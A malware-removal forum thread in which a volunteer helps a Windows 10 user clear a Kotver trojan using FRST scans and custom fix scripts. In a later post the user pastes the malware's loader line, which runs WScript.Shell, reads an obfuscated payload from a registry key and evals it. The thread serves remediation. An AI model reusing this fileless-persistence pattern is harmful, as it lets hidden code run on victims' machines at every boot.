rap93
New Helpee
Posts: 9
|
Post by rap93 on Oct 8, 2016 8:09:17 GMT -8
Good morning, My PC is infected with Trojan.Kotver!gm2. I'm on Windows 10 on a Dell system running Norton Security Suite. As I'm sure others have said, Norton detects and asks me to restart, but then the process just repeats. Power Eraser did not find it. I have NOT run any other virus/malware software. It "appears" to be finding it in the folder c:\windows\syswow64\ , but obviously isn't getting all of if. I have run the First64 file, and linked the files from wikisend below. I would greatly appreciate your help, Robert First.txtAddition.txt
|
|
dbrisen
Malware Removalists
Posts: 3,688
|
Post by dbrisen on Oct 8, 2016 15:15:57 GMT -8
Thanks for the logs; I hope the instructions were clear enough for you. FIRST >>>>Please go to START (Windows Orb) >> Control Panel >> Uninstall a Program or Programs and Features and remove the following (if listed): QuickTime 7To do so, left clicking on the name once and then click Uninstall/Change at the bar above the list window. Follow the prompts of the uninstaller BUT please read carefully any questions it asks before answering; some uninstallers will try and deceive you into keeping the software. SECOND >>>>Open notepad by pressing the Windows Key + R key, typing notepad in the Run box and pressing Enter. Please copy the contents of the quote box below. To do this highlight the contents of the box and right click on it and select copy. Paste this into the open notepad. Save it to your desktop as fixlist.txtNOTE. It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work. NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating systemStart FRST that is on the desktop by right clicking on file and selecting "Run as Administrator..." and press the Fix button just once and wait. If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run. When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply. LAST >>>>How is your system running now?
|
|
rap93
New Helpee
Posts: 9
|
Post by rap93 on Oct 8, 2016 18:37:33 GMT -8
Things seems to be better. Norton is not finding it like it used to. Also the computer CPU isn't spontaneously "running" high usage. I have attached the Fixlog file. One thing I need to mention, when the PC reboots I get a "Script Error". It says: Line: 1 Char: 74 Invalid root in registry key "HKCU\software\ybaiafd\cnoid" Code: 0 URL: Do you want to continue running scripts on this page? Then I have to answer Yes or No. You thoughts? Fixlog.txt (56.11 KB)
|
|
dbrisen
Malware Removalists
Posts: 3,688
|
Post by dbrisen on Oct 8, 2016 20:38:40 GMT -8
Thanks for letting me know that; it seems the malware has mutated in a new direction .... hmmm FIRST >>>>Read Slowly and all of it.If you still have a Addition.txt log file on your desktop, please delete it now. Start FRST64 that is on your Desktop by double clicking and allowing the software to run when the User Access Control asks (if it does). The tool will start to run. When the tool opens click Yes to disclaimer. (if it does) Select Additional.txt and the Shortcut.txt in the Optional Scans section of FRST64. Press Scan button. It will make three logs ( FRST.txt, Addition.txt, and Shortcut.txt) on your Desktop. Please attach the logs in your reply back. Notes:
If your Security software blocks the running or download of FRST / FRST64, please disable the security software or make an exception for this file. FRST is updated very frequently and is safe to run but because of the frequent changes (to keep up with newest malware techniques) most Security Software does not approve of the unknown file. Right now the forum will not allow one to attach the Addition.txt file so please use wikisend.com or pastebin.com to upload the file and then post the download link here in your reply post. SECOND >>>>Please download Check Browsers LNK from here . Double click on the file and let it run. Attach the log file Check_Browsers_LNK.log in a reply post here.
|
|
rap93
New Helpee
Posts: 9
|
Post by rap93 on Oct 9, 2016 6:43:38 GMT -8
|
|
dbrisen
Malware Removalists
Posts: 3,688
|
Post by dbrisen on Oct 9, 2016 15:30:49 GMT -8
Quick question:
Do you still get the script error message when booting? Does it show what browser / parent window this comes from? Perhaps in the windows title bar?
|
|
dbrisen
Malware Removalists
Posts: 3,688
|
Post by dbrisen on Oct 9, 2016 16:02:10 GMT -8
Open notepad by pressing the Windows Key + R key, typing notepad in the Run box and pressing Enter. Please copy the contents of the quote box below. To do this highlight the contents of the box and right click on it and select copy. Paste this into the open notepad. Save it to your desktop as fixlist.txtNOTE. It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work. NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating systemStart FRST that is on the desktop by right clicking on file and selecting "Run as Administrator..." and press the Fix button just once and wait. If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run. When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply. How is your system running now?
|
|
rap93
New Helpee
Posts: 9
|
Post by rap93 on Oct 9, 2016 16:10:34 GMT -8
I just rebooted and got the same message. There is a title bar, but I can't highlight it to copy. I've been trying to find a way to upload a screenshot for you but wikisend won't let me upload a jpeg or pdf. So I'm going to try to reproduce it, but it's long.
javascript:SO0YdY9W="SwKgOO";hU30=newActiveXObject("WScript.Shell");yP3P5g="8OPVn";dGQ2q=hU30.RegRead("HKCU\\software\\ybaiafd\\cnoid");yufE7="jiD3SOwL";eval(dGQ2q);W1LL4ctS="SgXy45P";
|
|
rap93
New Helpee
Posts: 9
|
Post by rap93 on Oct 9, 2016 16:12:05 GMT -8
Wait, I sent that last reply before I saw your most recent. So I have not tried that yet.
I'll do that now.
|
|
rap93
New Helpee
Posts: 9
|
Post by rap93 on Oct 9, 2016 17:04:57 GMT -8
I ran your fix and everything seems to be running great now. I did NOT get the script error upon reboot. Here is the fixlog: Fixlog.txt (5.64 KB)
|
|